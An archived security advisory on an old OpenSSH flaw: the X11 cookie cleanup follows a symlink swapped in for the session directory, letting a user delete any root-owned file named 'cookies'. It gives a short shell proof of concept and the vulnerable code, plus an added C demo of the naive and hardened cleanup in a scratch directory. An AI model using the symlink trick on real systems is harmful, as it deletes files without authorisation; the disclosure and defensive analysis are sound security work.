TUCoPS :: Linux :: Apps N-Z :: openss~1.htm

OpenSSH - delete cookies file
Vulnerability
 OpenSSH
Affected
 OpenSSH
Description
 'zen-parse' found the following. You can delete any file on the
 filesystem you want... as long as it's called cookies. Not really
 a very useful bug, but could cause annoyances to people who
 actually like their cookies.
 Sample exploit:
 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun 4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory
 Tested on Red Hat Linux release 7.0 (Guinness):
 [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
 openssh-server-2.5.2p2-1.7.2
 [zen-parse@clarity zen-parse]$ ssh -V
 OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f
 The configuration file has not been modified from the default
 settings. Although sshd does drop root privileges, the process's
 groups are not cleared. (From /proc/$$/status of the sshd handling
 the session, and the output of strace and ltrace: there is no use of
 initgroups in the ltrace output of the process that creates the
 directory, although it does change euid beforehand, and there is no
 setgroups in the strace output.)
 The file itself is created with O_EXCL so a symlink in place of
 the file cannot be used to create/overwrite arbitrary files.
 This vulnerability works fine on both RedHat 7.1 & 7.0 with the
 latest updated packages from RedHat installed.
 Jerry Connolly tested it on OpenSSH_2.5.2 on OpenBSD and it
 worked. He had to enable X forwarding on the client and server
 before the remote machine would create (and attempt to unlink())
 the cookies file. The offending code is in session.c in the
 xauthfile_cleanup_proc() function:
 <SNIP>
 /*
  * Remove local Xauthority file.
  */
 void
 xauthfile_cleanup_proc(void *ignore)
 {
         debug("xauthfile_cleanup_proc called");

         if (xauthfile != NULL) {
                 char *p;
                 unlink(xauthfile);
 </SNIP>
 where xauthfile points to a buffer containing the name of the
 cookies file.
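 The mechanism behind the advisory, as an added example that is not OpenSSH
 code and not the fix the project shipped: unlink() never follows a symlink in
 the final path component, but it does resolve every directory component, so
 once the user has replaced the per-session directory with a symlink the
 cleanup's unlink("/tmp/ssh-XXW9hNY9/cookies") lands on "<target>/cookies".
 The names naive_cleanup, safe_cleanup, build_tree and cleanup_outcome, the
 scratch tree under mkdtemp() and the "cookies" file inside it are this
 example's own constructions; it runs entirely as the invoking user, because
 the defect is path resolution rather than privilege, and the hardened variant
 is one reasonable design, not a description of what OpenSSH's CVS change did.

```c
/* Added example, not OpenSSH code; every path and file below is constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Same shape as xauthfile_cleanup_proc(): unlink() the full path.  unlink() does not
 * follow a symlink in the last component but resolves every directory component, so
 * a symlink where the session dir was turns /tmp/ssh-XXW9hNY9/cookies into /cookies. */
static int naive_cleanup(const char *xauthfile)
{
    return unlink(xauthfile);
}

/* Hardened cleanup (this example's suggestion, not OpenSSH's fix): open the session
 * dir itself with O_NOFOLLOW, verify through the descriptor that it is a directory
 * owned by the expected uid, then unlink the name relative to that descriptor. */
static int safe_cleanup(const char *dir, const char *name, uid_t expected_uid)
{
    struct stat st;
    int fd = open(dir, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;                    /* ELOOP if a symlink sits there */
    int ok = fstat(fd, &st) == 0 && S_ISDIR(st.st_mode) && st.st_uid == expected_uid;
    int rc = ok ? unlinkat(fd, name, 0) : -1; /* acts inside the verified dir only */
    close(fd);
    if (!ok) errno = EPERM;
    return rc;
}

static int make_file(const char *path)        /* O_EXCL, as sshd creates the cookie */
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    return fd < 0 ? -1 : close(fd);
}

/* Scratch tree under mkdtemp(): <root>/cookies stands in for /cookies; <root>/ssh-session
 * is the per-session dir, with attack=1 a symlink back to <root> (the advisory's
 * "rm -r ...; ln -s / ..."), with attack=0 a real directory holding its own cookie. */
static int build_tree(char *root, size_t rootlen, int attack)
{
    char path[PATH_MAX];
    const char *tmp = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    snprintf(root, rootlen, "%s/cookies-demo.XXXXXX", tmp);
    if (mkdtemp(root) == NULL) return -1;
    snprintf(path, sizeof path, "%s/cookies", root);
    if (make_file(path) < 0) return -1;
    snprintf(path, sizeof path, "%s/ssh-session", root);
    if (attack) return symlink(root, path);
    if (mkdir(path, 0700) < 0) return -1;
    snprintf(path, sizeof path, "%s/ssh-session/cookies", root);
    return make_file(path);
}

static int exists(const char *root, const char *rel)
{
    char path[PATH_MAX]; struct stat st;
    snprintf(path, sizeof path, "%s/%s", root, rel);
    return lstat(path, &st) == 0;
}

static void remove_tree(const char *root)
{
    const char *rel[] = { "cookies", "ssh-session/cookies", "ssh-session" };
    char path[PATH_MAX];
    for (size_t i = 0; i < 3; i++) {
        snprintf(path, sizeof path, "%s/%s", root, rel[i]);
        if (unlink(path) < 0) rmdir(path);    /* file or symlink: unlink; real dir: rmdir */
    }
    rmdir(root);
}

enum outcome { SETUP_FAILED = -1, NO_EFFECT, VICTIM_DELETED, REFUSED_SYMLINK, COOKIE_REMOVED };
/* Build one tree, run one cleanup on <root>/ssh-session/cookies as the current user
 * (the point is path resolution, not root), and classify what happened. */
enum outcome cleanup_outcome(int attack, int use_safe)
{
    char root[PATH_MAX], dir[PATH_MAX], file[PATH_MAX];
    if (build_tree(root, sizeof root, attack) < 0) return SETUP_FAILED;
    snprintf(dir, sizeof dir, "%s/ssh-session", root);
    snprintf(file, sizeof file, "%s/cookies", dir);
    int rc = use_safe ? safe_cleanup(dir, "cookies", getuid()) : naive_cleanup(file);
    enum outcome out = NO_EFFECT;
    if (rc < 0 && errno == ELOOP && exists(root, "cookies")) out = REFUSED_SYMLINK;
    else if (!exists(root, "cookies")) out = VICTIM_DELETED;
    else if (rc == 0 && !exists(root, "ssh-session/cookies")) out = COOKIE_REMOVED;
    remove_tree(root);
    return out;
}

int main(void)
{
    printf("naive cleanup, symlinked dir: %d (1 = victim deleted)\n", cleanup_outcome(1, 0));
    printf("safe cleanup, symlinked dir:  %d (2 = refused symlink)\n", cleanup_outcome(1, 1));
    printf("safe cleanup, real dir:       %d (3 = cookie removed)\n", cleanup_outcome(0, 1));
    return 0;
}
```

 Two design points. The open() deliberately omits O_DIRECTORY so that a symlink
 fails with the unambiguous ELOOP (Linux reports ENOTDIR instead when
 O_DIRECTORY is also set); the fstat() on the descriptor covers the
 directory-and-owner requirement and, because unlinkat() works relative to that
 descriptor, nothing the user does to the path after the check can redirect the
 unlink. The example's cleanup runs as the same uid that owns the scratch tree;
 in the advisory the cleanup ran in sshd's privileged context, which is why a
 symlink to / reached a root-owned file.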
Solution
 Fixed in OpenSSH's CVS (see www.openssh.com).
